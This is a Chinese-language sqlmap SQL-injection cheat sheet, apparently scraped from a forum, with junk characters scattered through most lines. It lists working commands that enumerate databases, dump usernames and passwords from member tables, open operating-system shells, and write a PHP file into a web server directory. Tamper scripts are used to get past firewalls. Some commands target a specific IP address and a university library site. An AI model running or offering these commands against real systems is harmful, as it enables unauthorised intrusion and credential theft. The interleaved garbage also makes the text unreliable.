/pentest/database/sqlmap0 u, _+ l+ [$ |( _8 a& V
& S& L2 B& s% C. N" E( {# T. K2 Lupdate :::::> in the folder after execute following order : svn update& a+ g* L: T$ x( M5 v5 R
% F: @! K7 V* H: A' ssqlmap.py -r 1.txt --current-db- E2 G3 o5 K" s0 @. H6 |
" ~5 Q8 m) A& s( r" U L; ^
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”2 U) F* |7 N7 L2 G$ L2 x0 l" k; U
3 }0 `. D9 I3 B3 N$ L V. M) j
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
8 _1 J. ?( x9 \猜解数据库# S. g- g) M; n0 @0 z
./sqlmap.py -u "injection-url" --dbs% ?! s$ O" C' i, r# Z; [
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"6 i O4 ?. C9 ~/ M) D) Z! `
0 }1 l7 j9 E9 n, y+ o0 b8 A& {* O: q" v
猜解表名0 a) Z, S$ P( v
./sqlmap.py -u "injection-url" -D database_name --tables6 h* ]1 I+ |& J) Q" [. c2 v
+ V L9 [* `; R7 B& F1 C' t$ x9 `sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"- V) F0 _" V( z
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" 6 t: o# u; B4 D# k" t8 _) o* P) L$ Q
9 ~) x1 N5 Q, r* i+ f
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
5 q( Z% T: J6 B3 ~9 l* G; M- p8 S. Q2 g. l6 ?* g6 G
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
6 y5 H" P2 }3 `2 ^3 \' [! p* ksqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py") `; s3 g- n1 E; R5 W! C) |
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" ( _9 t* n1 [; u S2 n
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py") @% c# h2 X3 p; S1 Z7 B
$ A( U9 B2 `) X R. p( |( X
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
& Q. @5 s' B+ ]sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
- _5 `1 J+ _: y$ f8 Wsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
( Z* @2 Y! G& w, L: m$ d& qsqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"" y, E% ] Z* L( C* ?5 t, _
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump' x; }: M$ }) b. W* o2 I) y
* T. m2 }4 X" i
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了4 O/ [, V% K5 @' n/ e
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
% {3 D- j5 [6 g8 A) @
, P) i, l* I( L% q, j, K i# Hsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"8 e: u$ G, o. p% q6 ~$ o
猜解列名
& g+ h2 l" Z) p! M. M/ X2 T; y./sqlmap.py -u "injection-url" -D database_name -T table_name --columns% Y* F/ s C% A" Y3 Y9 w
" v2 d, N* {' A$ X+ N; |1 C. fsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
* N0 ~) `( T8 y7 ^- `, j9 E$ Tsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" |3 t( K, ?6 b2 t
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
; k( `7 S! @) S! E) @7 |
4 C- K4 {- C& B; F4 e3 gsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
- l0 J) ?0 P2 d3 z, M# K$ @&submit=Go' d- k- G: W7 A a. B6 ~! h/ p( X
猜解值
+ t1 n5 c( g4 p./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
5 ^' N# ~8 \+ `1 H: L======================================================== [6 a. e- A# k& @
搜索表名中包括mana字符的 O. B! z1 s3 y/ @+ |
/sqlmap.py -u "injection-url" -T mana --search
( O# }; [& U" {6 A返回一个交互式sql shell
5 y }! J( q% u$ g/sqlmap.py -u "injection-url" --sql-shell
! d0 M0 F0 o/ k+ m; R Q X" x n- Z读取指定文件(需权限). l$ `% {) o' D0 i* p- P1 j
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"8 p. L7 L$ f$ x- F2 q' V
查看当前 用户 及 数据库
2 x7 b* K" Z9 N0 I* Z/sqlmap.py -u "injection-url" --current-user --current-db
6 W/ `3 `- k; V, |( N本地文件 写入 远程目标绝对路径7 }7 V* N# m& |8 z( p1 x7 G
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径! a" |) X$ O) O' P
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
# [4 i* N- O/ E- J
) x# @" o) d4 U' q1 z4 W4 }: ^sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
; N% O9 M( p+ z$ w; v, I/ U查看某用的权限
) ?% ]' r* x2 {. i% {9 n# _+ e1 L/sqlmap.py -u "injection-url" --privileges -U root
$ O' C, w! ^) S1 h0 g9 }" @查看当前用户是否为dba
$ Z6 V9 L: @( [, s/sqlmap.py -u "injection-url" --is-dba
( }$ P4 L0 v2 I s* t8 U读取所有数据库用户或指定数据库用户的密码1 ?) L% Y/ E! `* B$ D, c8 x
sqlmap.py -r 1.txt --users --passwords8 I3 U1 Q& i K( q* v, C4 M
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
9 _) K2 x: R$ ?& ~" N
8 G* [" e& x9 I: M2 P' ~/sqlmap.py -u "injection-url" --passwords -U root+ i' J2 V- [- ~! ^
0 J# R# U- x( b9 M0 t( t$ K
--start&&--stop 与 --first&&--last 的区别4 I: L+ ~; p- R7 M5 j; V4 ?7 o+ h
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)' X* @+ X- t h6 z& K
0 a, d$ [; L" B, E
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
+ I2 i3 Y! i" w! i5 R; B/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables ~( r' Z; G' z
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
# {$ X$ B9 q: F7 T5 G9 o" L& f; ~8 ]4 m2 I1 e7 J4 X
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
) W" d; _4 Y Y+ r/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"; ?% x, T) s+ d* ^
+ @8 [7 r: y( ?, t6 ?5 L |